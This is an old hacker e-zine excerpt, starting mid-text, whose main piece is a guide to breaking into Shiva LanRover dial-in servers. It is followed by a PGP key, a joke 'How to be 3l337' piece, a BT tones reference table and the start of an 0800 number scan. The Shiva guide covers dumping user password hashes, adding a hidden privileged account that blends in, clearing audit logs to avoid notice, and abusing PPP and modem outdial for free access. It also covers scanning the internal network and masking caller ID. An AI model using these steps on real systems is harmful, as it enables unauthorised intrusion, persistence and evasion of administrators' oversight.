that most of the time users are not configured to be allowed remote dialin PPP access, so the user jsmith is probably at a terminal on the LAN. Now you can see who is online, ie- check the admin is not loged in. Now you need to get a rough idea of the size of the system and it's network. At the # prompt type: ShivaLanRover/8E# show lines Async Lines: Line State Rate/P/Stop/ RA|DCD|DSR|DTR|RTS|CTS|Fr errs| Overruns|PErrs 1 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 2 CHAR 57600/N/ 1/ |ON |ON |on |on |ON | 2| 0| 0 3 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 4 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 5 IDLE 57600/N/ 1/ |OFF|OFF|on |on |OFF| 0| 0| 0 6 IDLE 115200/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 7 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 8 IDLE 115200/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 Here we see a list of the modem ports, as you can see it has 8, this is about average for most Shiva systems. So now we know how many serial lines there are, we need to get a rough idea as to how big the network itself is, to do this type: ShivaLanRover/8E# show arp Protocol Address Age Hardware Addr Type Interface Internet 208.122.87.6 4m x0-x0-B0-2x-Dx-78 ARPA Ethernet:IP Internet 208.122.87.4 4m AA-0x-x4-00-0C-04 ARPA Ethernet:IP Internet 208.122.87.5 4m Ax-00-04-0x-xD-x4 ARPA Ethernet:IP Internet 208.122.86.4 10m AA-x0-04-00-0C-04 ARPA Ethernet:IP Internet 208.122.86.40 0m AA-00-04-00-x1-04 ARPA Ethernet:IP Internet 208.122.86.147 4m 00-80-5x-31-F8-Ax ARPA Ethernet:IP Internet 208.122.86.145 4m 00-80-5x-FE-C9-x8 ARPA Ethernet:IP Internet 208.122.86.200 0m 00-x0-A3-xF-21-C8 ARPA Ethernet:IP Internet 208.122.86.51 4m 00-x0-B0-01-36-3x ARPA Ethernet:IP Showing the arp cache reveals some of the connected boxes to the LAN, aswell as ethernet address, and type of protocol. Now we have established the kind of system we are on, it's time to do some exploring, which is where I shall begin this text file. 2. What can Shiva lan rovers do? Shiva LanRover systems are very big security weaknesses if installed on any network. The reason for this is that some of the default settings can be easily overlooked by the admin. A Shiva system can be configured to provide a wide variety of network services, some of which are listed here: PPP (point-to-point protocol) This is the key to gaining access to the network on which the Shiva is based upon, in most cases the network will have an internal DNS server, and if you are lucky, the network which the system is based will be connected to the internet. Hint hint, PPP, toll-free. But just using a Shiva for free net access would be boring, which is why I am going to discuss the other features of Shivas. Modem Outdial. In alot of cases the system would have been configured to allow modem outdialing which can be good for calling BBS's, diverting to other dialups, scanning, but again, this is lame, just using a Shiva for modem outdialing is boring, use your imagination. If you manage to get a PPP connection, and the system is net connected, you could get online, and at the same time call your favourite BBS. I'll explain how to do all of this later. Telnet, ping, traceroute etc. These are the command line tools which will enable you to determine whether the system is connected to the internet or not. More on this later. It's time to go into detail about all of the Shivas functions and commands, I will concentrate on what you can do with root access, because that is the only account you are likely to gain access to. 3. The command line When loged into the Shiva shell, you have the following commands at your disposal: alert (Send text alert to all dial-in users) - Self explanitory. busy-out uart (Busy-out UART port) clear (Reset part of the system) The clear command is a nice feature of the Shiva system. The first thing you should do when on a Shiva is make sure you erase all logs of your commands and login times etc.. to do this all you need to do is type This will erase and reset the audit log, and also any invalid logins to the Shiva. There are also other clear commands such as etc, but these will all cause system problems and get you noticed, best leave this alone for the time being. comment (Enter a comment into the log) configure (Enter a configuration session) Heres the part where you can get the system to do what you want it to do, ie- to get a PPP connection you will need to set up another account with shell and PPP privalages. The root account does not allow PPP connections, so here is where you will need to do your stuff. To get anywhere with a Shiva you need to create a new account, using the config command you can create a new user account with greater privalges than root. Before you make a new account it is a good idea to see what kind of setup the other accounts have on the system, you don't want to make an account that will stick out from the other accounts, so type: show security (this gives a list of the security configuration and the user list.) you should see somthing like this: [UserOptions] PWAttempts=0 ARARoamingDelimiter=@ ExpireDays=30 GraceLogins=6 [Users] admin=/di/do/rt/pw/sh/pwd=hH8FU4gBxJNMMRQ0yhj5ILUbaS/ml=3/fail=1/time=425 jsmith=/di/pw/pwd=.b9BJFBhuA1vuqFa9s8KBlxmngZ/ml=2/time=897646052 mjones=/di/pw/pwd=kRaOhlyT7CKMBldLVBVbektbCE/ml=2/fail=5/time=897646052 user911=/di/pw/pwd=7Xkq8TOwB4juRI51OHkDVVos8S/ml=2/time=910919159 another=/di/pw/pwd=YhzD6KBUB7Lh2iKKKSWxuR0gx7S/ml=2/fail=7/time=90767094|9 jadmams=/di/pw/pwd=ET0OhPyT7CyMBldLLKVbektbCE/ml=2/time=902262821 msmith=/di/pw/pwd=sDV1Jxo8QJncIRcl9eoVO6SKBE/ml=2/time=897646052 dsmith=/di/pw/pwd=pv8OhPyT45CyMBldLSKVbektbCE/ml=2/time=897646052 padacks=/di/pw/pwd=HoDVw5MqTM*oTL69tBehqt7tiS/ml=2/time=897646052/grace=1 ljohnson=/di/pw/pwd=r.y9NJbrCWKfsSeu9FbfJpAIzZ/ml=2/time=897646052 Here we get a list of the configured users on the system. As you can see the admin has made him/herself their own account, while other users have accounts that allow logins via their terminals, but not remotely. In the above example all the users have been assigned passwords, so it would be a good idea when you make your own account to have one aswell. The idea is to make an account that will blend in with the others and not look to obvious. The passwords in the external user list are all 3DES (triple DES) encrypted. The type of user account set up is determined by the options, such as jsmith=/di/do etc, more on these functions in a bit. OK, now we need to set up our own account, to do this we need to enter a configuration session, at the command line prompt type: ShivaLanRover/8E# config You will then drop into the configuration session. Enter configuration file lines. Edit using: ^X, ^U clear line ^H, DEL delete one character ^W delete one word ^R retype line Start by entering section header in square brackets [] Finish by entering ^D or ^Z on a new line. config> (here is where you enter the config commands, to make you own account do the follwing) config> [users] config> username=/di/do/sh/tp/pw config> ^D <------ (type control D to finish) Review configuration changes [y/n]? y New configuration parameters: [users] username=/di/do/sh/tp/pw Modify the existing configuration [y/n]? y You may need to reboot for all changed parameters to take effect. You've just created your own user account which you can use for PPP connections etc. To begin with your account is un-passworded, so when you log back in just hit enter for your password, you can later change this. The /sh part of the user configuration means you can remotely log into the command shell, /pw means you have the ability to define your own password, if you wanted to give yourself another root account, you would use the switch /rt. In combination with the show config command you can also alter other system configurations via this method, although it is a very good idea not to alter anything. Now your account has been set up, all you do is re-connect to the system and login as your username, more on this later. connect (Connect to a serial port or modem) This is another one of the good features of Shivas, you can remotely control a series of modems on the system, and in alot of cases dialout. If you want to call a BBS, note you cannot upload using Zmodem or similar protocols, although you would be able to download, but expect a few CRC checksum errors. To connect to a modem type: connect all_ports you will then drop into one of the modem pools, as follows: Connecting to Serial2 at 115200 BPS. Escape character is CTRL-^ (30). Type the escape character followed by C to get back, or followed by ? to see other options. (here basic modem commands are nessasary, use the follwing to dialout) ATZ (initialise modem) ATDTxxxxxxxxx (atdt then phone number) note in some cases the modem outdial with be based upon the system PBX, so sometimes you will have to figure out the outdialing code, which should be somthing simple like dialing a 9 before the number you want to connect to. To disconnect from the outdialing session type control C, or ^C. This will take you back to the command line. As with the other system events, outdialing is loged into the audit file, along with the number you called. It is generaly a good idea to clear the audit log after things like PPP or dialout, again just type clear log . cping (Send continuous ICMP echoes to IP host) crashdump (Write crashblock to log) detect (Detect the configuration of an interface) disable (Disable your root privaleges) dmc (Information commands, type "dmc ?" for list) down (last Remove modems from CCB pool) info (Print info for specified modem) mupdate (l Update Rockwell modem FW) state (Print state of a modem) status (Print status of all modems) trace (Trace message passing) up (lastmo Add modems to CCB pool) test_1slot (Tests DMC card in slot specified) test_allcards (Tests all DMC cards found in system) test_golden (Tests all DMC cards against a Golden DMC) test_loopall (Tests All DMC's for count) test_modempair (modem1 Tests modems against each other) test_slotpair (Tests a DMC card against another) test_xmitloop (Tests modem pair for count) help (List of available commands) history (List of previous commands) initialize (Reinitialize part of the system) l2f (L2F commands) close (Close tunnel to L2F HG) login (Start L2F session) tunnels (Show open tunnels) lan-to-lan (Manage LAN-to-LAN connections) passwd (Change password) ping (Send ICMP echo to IP host) ppp (Start a PPP session) quit (Quit from shell) reboot (Schedule reboot) route (Modify a protocol routing table) rlogin (Start an rlogin session) show (Information commands, type "show ?" for list) show+ account (Accounting information) arp (ARP cache) bridge (Bridging information) buffers (Buffer usage) configuration (Stored configuration, may specify sections) the show config command will reveal all the system configuration setups, includings DNS server information, security configurations, IP routing etc. It will also show the internal IPs of radius authentification and TACAS servers. show+ finger (Current user status) interfaces [name1 [name2 ... ] (Interface information) ip (Internet Protocol information, type "show ip ?" for list) To get an idea of the routing information, and again how big the network is type, show ip route. This will bring up a routing table, and again give you an idea as to where the connected boxes are, it is a good idea to note the IP prefixes. show+ lan-to-lan (LAN-to-LAN connections) license (Licensing information) lines (Serial line information) log (Log buffer) The show log command will display the system audit log in more format. Here you will be able to see what is going on on the system, ie- is it primarily used for PPP, dialout etc. If users use the system for outdialing, you can even see the numbers that they dial. Here is a cut down example as to what you wiuld see in a system log file: Mon 15 16:24:29 GMT 1998 4530 Serial4: "krad" logged in 00:01 4531 Serial4:PPP: Received LCP Code Reject for code 0D 00:01 4532 Serial4:PPP: Received PPP Protocol Reject for IPXCP (802B) 00:00 4533 Serial4:PPP:IP address xx.xx.xx.xx dest xx.xx.xx.xx bcast 00:00 4534 Serial4:PPP: IPCP layer up 00:04 4535 Serial4:PPP: CCP layer up 14:09 4536 Serial4:PPP: IPCP layer down 00:00 4537 Serial4:PPP: CCP layer down 00:00 4538 Serial4:PPP: LCP layer down 00:01 4539 Serial4:PPP: CD dropped on connection 00:00 4540 Serial4: "krad" logged out: user exit after 14:17 (Dial-In PPP,) 00:06 4541 Serial4: Rate 115200bps 00:00 4542 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W' 00:01 4543 Serial4: Initialized modem 04:56 4544 setting time of day from real-time clock to Wed Nov 25 16:43:44 18:27 4545 Serial4: New Dial-In session 00:00 4546 Serial4:PPP: LCP layer up 00:00 4547 Serial4: "krad" logged in 00:01 4548 Serial4:PPP: Received LCP Code Reject for code 0C 00:00 4549 Dialin:IPX configured net 9823O049 00:00 4550 Serial4:PPP: IPXCP layer up 00:00 4670 Serial4: New Command Shell session 00:03 4671 Serial4: "root" logged in 01:38 4672 Serial4: "root" logged out: user exit after 01:42 (Command Shell) 00:06 4673 Serial4: Rate 115200bps 00:01 4674 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W' 00:00 4675 Serial4: Initialized modem 55:11 4676 Could not parse IP SNMP request. In the system log, you will also see invalid login attempts, error messages, and general system events. Because the log file logs everything, it is a good idea to erase your own presence in it. show+ modem (Internal modem information, type "show modem ?" for list) netbeui (NetBeui information, type "show netbeui ?" for list) novell (NetWare information, type "show novell ?" for list) ppp (PPP multilink bundles and links) processes (Active system processes) security (Internal userlist) semaphores (Active system semaphores) slot (Internal serial slot information, type "show slot ?" for list) upload (Upload information) users (Current users of system) version (General system information, also shows DNS info) virtual-connections (Virtual Connection information) slip (Start a SLIP session) telnet (Start a Telnet session) tftp (Download new image, ie- system config files) tunnel (Start a Tunnel session) wan [action] (Perform actions on WAN Interface) 4. System security Shivas can be very weak on security, due to the exposed root account. If the system is configured properly they can be very secure systems, although this is usually not the case. There are many security options for the Shiva system including Radius Authentification, SecurID, TACAS, and just the standard secured login. In some cases an admin will use a secondary server to act as the Radius Authentification. In this case, the setup would look somthing like this. [RADIUS Authentification Server] } The server contains a secured user | list, which will be used to verify | login requests. The login is [Router] determined if the user can be | | verified by the server. | | } The Shiva sends the login request to RADIUS. [Shiva System] } Starting Radius Authentification... @ Userid: Sometimes a system will be configured to work with a number of different Shivas on a network. For example, using the same idea as above, but without the Radius server, a secondary shiva may be installed to act as the security server, whereas all other Shiva systems refer to it for user login verification. This can be a real bitch if you have loged into a system, but the above setup has been implemented. For example, say you loged in as root, and you want to set up a PPP account. The first thing you would do is check to see what kind of setup existing users have by typing If the verification server has been setup, there will be no users in the user list, instead you have to find the network location of the verification server, and hope it has an un-passworded root account on it. To find the verification srever, or primary Shiva, just use the show config command. you can then telnet from the Shiva you are on, to the Shiva displayed in the config file, you should then get the @ Userid: login screen again, try root no pass, if this does not work, it is possible to temorarily configure your own server on the network, but this would mean other users will not be able to login, so leave this alone. If you do manage to login to the server as root, you have to setup your user account there, because that is where all the Shivas on the network refer to in order to verify users, this way the admin only has to maintain one user configuration file. 5. PPP Once you have setup a user account with shell and PPP privaleges, you can begin exploring the network on which the Shiva is based upon. If the network is net connected you can get free net access aswell, but this is quite risky, especially if the admin notices PPP sessions active at 4am, with destinations such as irc.ais.net:6667. When you first establish a PPP connection to a Shiva server, the first thing you should do is map out the network. To do this just run a network, or port scanner accross the domain which the Shiva is on. As on most networks, you are likely to come accross a variety of different boxes, such as UNIX boxes, SunOS, shared printers, mail servers, cisco routers, in one case someone I know found an Amiga box@$!. If the network is net connected, it is a good idea to use your shell for any net connections, such as IRC. Once you have an external net connection from a Shiva it is also possible to similtaniously dialout accross the PSTN to a BBS or any other system. To do this, you would have to find the network address of the Shiva server you are on, then telnet back to it and re-login. using the command will give you control over the system modems, then you can dialout as if you where in terminal mode. If the Shiva you are on is located on a toll-free number, or even local, it is not a good idea to use it for net access, or stay on it for a long time. If you must use a Shiva for net access, it is a good idea to use your PSTN routing skills, and not dialup to the system directly. The mistake people make when it comes to ANI, or CLID is that they think only 800 numbers have ANI, and residential numbers have CLID. This is *wrong* the ANI service can be setup by anyone, it's a choice, not a standard. If you want to route your call, the best thing to do is route internationaly, so your origionating clid gets striped at intralata boundarys on the PSTN. A technique, which I don't wanna give out involves trunk and carrier hoping. We'll thats about it for this file, hope you enjoyed it. If you want more information on the Shiva Lan Rover system, just check out shiva.com, they will have technical guides in pdf format, you can also download the shiva software from their ftp site. Shouts to the following: [9x] substance phriend siezer vectorx statd blotter knight network specialK microdot katkiller xramlrak bosplaya deadsoul and nino the 9x g1mp. [b4b0] gr1p t1p. #9x #darkcyde Efnet. backa xio. Bodie (the elite geezer who supplies all my internet needs and is genrally the elitest bloke in the world) [D4RKCYDE] downtime elf zomba force mortis angel dohboy brakis alphavax tonekilla bishopofhell sintax digitalfokus mistress. -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 5.0i for non-commercial use Comment: I Encrypt, Therefore I Am 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 7oRrJiSlVzrE1bEEhZR9hnFqogL6QXg= =lHXD -----END PGP PUBLIC KEY BLOCK----- *********************************************** * hybrid_blue@hotmail.com | DSS: 0x5493F1307 * * th0rn@coldmail.com | D-H: 0x8B314ED9 * * hybrid@darkcyde.org | RSA: 0xA42A953D * * th0rn@cyberspace.org | * * www2.dope.org/9x | 1999-02-09 * * www.darkcyde.8m.com | * *********************************************** ---(OOooOO)--------How to be 3l337--------------------------------------(OOo- ---(OOooOO)--------by force---------------------------------------------(OOo- ---(OOooOO)--------force007@hotmail.com---------------------------------(OOo- "well, secOnd by secOnd and minute by minute, its like lOttO, yOu gOtta be in it tO win it" this file is for all of you newbies/lamers that wanna be as eleet as the people who keep calling you names on that newsgroup yes! it can be done! just follow the simple steps below and you too will be able to call people names and make yourself look good! what are you waiting for? get reading! step 1 +======+ first of all you need to go down to blockbuster video and rent out Hackers and Wargames watch them both about 5O times then your ready for step 2 step 2 +======+ you really need a computer to be eleet so beg your father to get one tell him you need it for homework thats it! now you have a computer! step 3 +======+ now you need to be able to access the internet so tell daddy that you all of your friends can look at teletubbie websites and you feel left out step 4 +======+ when daddy's gone out connect to the internet i know it's very difficult but you have got that nice aol guide that came free with it haven't you? thats it! step 5 +======+ you can now search for hacking and phreaking with a search engine choose the one with the funny name Yahoo! well done step 6 +======+ go to all of the nice looking hacking and phreaking sites read all of the writing and look at all of the pictures step 7 +======+ to be truly eleet you need a (00l-@$$ nickname/handle either think of one yourself or choose one from the following list. o zEr0 c00l o cRa$h 0VeRiDe o CeReAl KiLLeR o aCiD BuRn the above names [as if you didn't know!] are from Hackers the film so they must be eleet. step 8 +======+ get yourself an account with hotmail or yahoo mail and use your new nickname so try to get something like this: zEr0_c00l@hotmail.com step 9 +======+ open up your news server and read all of the posts in alt.ph.uk alt.26OO alt.26OO.phreakz and alt.phreaking step 1O +=======+ it's time for you to make your first post to a newsgroup i suggest alt.ph.uk look through all of the posts until you find one saying 'how do i get free calls' or 'does red boxing still work?' reply to the group so everyone can see how eleet you are write something like this: 'y0 laMEr! y0u arE s0 laMe i tHiNk i'M g0nNa pUkE, wHy d0N't Y0u d0 s0mE reSeArCh bef0re y0u p0sT sHiT LikE ThAt eVeR heArD oF a SEaRch eNgiNe? 0h yeAh teLL y0uR MuM tHAt sHE 0wEs Me £1000000000000 f0r lAst niGHt l4m3r!' step 11 +=======+ incase you don't already know all eleet people write funny with 0's, 1's, 3's and 4's instead of letters. writing like that shows that you are truly eleet, you may ask why i'm not writing like that well to tell the truth i'm not eleet, i wish i was but i'm not step 12 +=======+ download mIRC and hang out in #phuk #2600-uk #evilhax0rs #phreak #hacking #hackers and #2600 you should get to know the regulars in the above channels and you will be able to go in there anytime and chat about how eleet you are and don't forget to call anyone you don't know lame and kick ban them straight away and ALWAYS remember to flame all posts made in alt.ph.uk it will make you look eleet and cool step 13 +=======+ learn html and java and use your skills to build your own webpage call it 'zEr0 c00l's eleet hax0r warez palace' and have loads of hacking phreaking anarchy cracking virii warez stuff on there that you took from someone elses site and pretend you wrote it. post the address to alt.ph.uk and tell them that if they don't visit it they are lAmE-aSs pieces of shit step 14 +=======+ now that you are well respected amoung other eleet people you should join a hacking/phreaking group and hang out with the eleet peeps if you can't find one or nobody will let you join one start your own and call it 'eleet hax0r d00ds' step 15 +=======+ hack into a big website and change the homepage to say 'zEr0 c00l w0z ere' and leave your e-mail address phone number and your home address you will get caught arrested and put in prison without trial this will make you look eleet to everyone else and you will have achieved your aim! people will have little banners on their webpages saying 'fReE zEr0 c00l!' well done! but by now you will be way too eleet for this text file and will have deleted it and sent me an e-mail telling me how lame i am oh well... ---(OOooOO)--------BT tones and announcments----------------------------(OOo- ---(OOooOO)--------by force---------------------------------------------(OOo- ---(OOooOO)--------force007@hotmail.com---------------------------------(OOo- 1. SCOPE ŻŻŻŻŻŻŻŻŻŻ This document describes the supervisory tones generated by the BT network and gives general information about BT network announcements. Tones and announcements encountered on the BT network can come from other networks, and customer premises equipment and these are not covered in this document. 2. NETWORK SUPERVISORY TONES ŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻ The supervisory tones that will be returned from the BT network are listed in Table 1. Table 1. Network Supervisory Tones +===============================================================================================+ | Network Generated | Significance | Range of levels | Tone Composition| Cadence | | Tone | | received at BT | ( 5% except | ( 10% except | | | | network interface | where stated) | where stated) | |===================|===================|====================|=================|================| |Proceed Indication |Proceed to dial |0 dBm to - 27 dBm. |350 Hz |Both tones | |(Dial Tone) |indication |Each tone separately|plus |continuous | | | |3 dB lower |440 Hz | | |-------------------|-------------------|--------------------|-----------------|----------------| |Special Proceed |Proceed to dial |0 dBm to -27dBm. |350 Hz |350 Hz tone - | |Indication |indication when |Each tone separately|plus |0.75 s ON. | | |certain |3 dB lower |440 Hz |0.75 s OFF | | |supplementary | | |plus | | |services have been | | |440 Hz tone - | | |invoked | | |continuous | | | | | |or both tones | | | | | |pulsed at the | | | | | |above rate. | |-------------------|-------------------|--------------------|-----------------|----------------| |Number Busy Tone |Called Customer's |0 dBm to -37 dBm. |400 Hz |0.375 s ON. | |(Engaged Tone) |line in use | | |0.375 s OFF. | |-------------------|-------------------|--------------------|-----------------|----------------| |Congestion Tone |Routeing equipment |-6 dBm to -43 dBm. |400 Hz |0.4 s ON. | |(Path Engaged Tone)|is temporally |0 dBm to -37 dBm. | |0.35 s OFF. | | |unavailable | | |0.225 s ON. | | | | | |0.525 s OFF. | | | | | |Note: Shorter | | | | | |tone is 6 dBm | | | | | |higher than the | | | | | |longer tone. | |-------------------|-------------------|--------------------|-----------------|----------------| |Special Congestion |Precedes some |0 dBm to -37 dBm. |400 Hz |400 Hz tone - | |Tone |congestion | |1004 Hz |0.2 s | | |announcements | | |1004 Hz tone - | | | | | |0.3 s | |-------------------|-------------------|--------------------|-----------------|----------------| |Connection Not |Call cannot be |0 dBm to -37 dBm. |400 Hz |Continuous | |Admitted Indication|routed to requested| | | | |(Number |number | | | | |Unobtainable Tone) | | | | | |-------------------|-------------------|--------------------|-----------------|----------------| |Awaiting Answer |Implies that called|0 dBm to 37 dBm. |400 Hz + 450 Hz |0.4 s ON. | |Indication |Customers line is | | |0.2 s OFF. | |(Ringing Tone) |being rung | | |0.4 s ON. | | | | | |2.0 s OFF. | | | | | |or 0.35 s ON. | | | | | |0.22 s OFF. | | | | | |Then start at | | | | | |any point in | | | | | |0.4 s ON. | | | | | |0.2 s OFF. | | | | | |0.4 s ON. | | | | | |2.0 s OFF. | | | | | |Note: Cadence | | | | | |does not | | | | | |necessarily | | | | | |coincide with | | | | | |call arrival | | | | | |indication | | | | | |cadence | |-------------------|-------------------|--------------------|-----------------|----------------| |Special Information|Precedes certain |0 dBm to -37 dBm. |950 Hz ħ 50 Hz |Each frequency | |Tone |announcements | |1400 Hz ħ 50 Hz |is sent for 330 | | | | |1800 Hz ħ 50 Hz |ms ħ 70 ms in | | | | | |the order given | | | | | |and with silent | | | | | |periods of up to| | | | | |30 ms between | | | | | |adjacent signals| |-------------------|-------------------|--------------------|-----------------|----------------| |Call Waiting |Indicates a second |0 dBm to -37 dBm |400 Hz |0.1 ON | |Indication |Incoming call | | |2 - 5 s OFF. | |-------------------|-------------------|--------------------|-----------------|----------------| |Special Call |Indicates a special|0 dBm to -37 dBm. |400 Hz |0.25 s ON. | |Waiting Indication |second incoming | | |0.25 s OFF. | | |call | | |0.25 s ON. | | | | | |0.25 s OFF. | | | | | |0.25 s ON. | | | | | |5.0 s OFF. | |-------------------|-------------------|--------------------|-----------------|----------------| |Pay Tone |Indicates credit |0 dBm to -37 dBm. |400 Hz |0.125 s ON. | |(Payphones) |expiry to payphone | | |0.125 s OFF. | | |(and called) | | |Continues for | | |customer | | |11 s to 13 s or | | | | | |until money is | | | | | |inserted into | | | | | |the payphone | |-------------------|-------------------|--------------------|-----------------|----------------| |Acknowledgement |Follows dialled |0 dBm to -37 dBm. |1600 Hz ħ 50 Hz |0.5 s to 1.5 s | |Tone |access code | | | | | |(e.g.144) and | | | | | |precedes automatic | | | | | |voice prompt | | | | | |instructions | | | | |-------------------|-------------------|--------------------|-----------------|----------------| |Confirmation Tone |Used in some |0 dBm to -37 dBm. |1400 Hz |20 s followed by| | |exchanges in place | | |silence | | |of an announcement | | | | | |to indicate that an| | | | | |interrogated | | | | | |service is active | | | | |-------------------|-------------------|--------------------|-----------------|----------------| |Switching Tone |Used in some |0 dBm to -37 dBm. |400 Hz |0.2 s ON. | | |exchanges in place | | |0.4 s OFF. | | |of am announcement | | |2.0 s ON. | | |to indicate that an| | |0.4 s OFF. | | |interrogated | | | | | |service is not | | | | | |active | | | | +===============================================================================================+ 3. NETWORK ANNOUNCEMENTS ŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻ A variety of announcements may be returned to a user during call set-up and clear down. Other announcements may be returned to the user during set-up, operation and cancellation of supplementary services and services other than basic access to the Public Switched Telephone Network (PSTN) (eg. Chargecard, 0345, 0800, 0898) Some announcements will be preceded by Special Information Tone. All announcements will have a mean level at the BT network interface in the range -14 dBm to -28 dBm and will be repeated for between 1 and 5 cycles. ---(OOooOO)--------UK scan of O8OO 919----------------------------------(OOo- ---(OOooOO)--------by force---------------------------------------------(OOo- ---(OOooOO)--------force007@hotmail.com---------------------------------(OOo- "where ya gOnna run when ya can't mOve further? 781 redrum with the murder" Key : NA = No answer B = Busy/engaged M = Modem/carrier VMS = Voice Mail System V = Voice/Picked up PBX = Private Branch eXchange 000 Answerphone p=1819 001 VMS 003 V 004 V 005 V 006 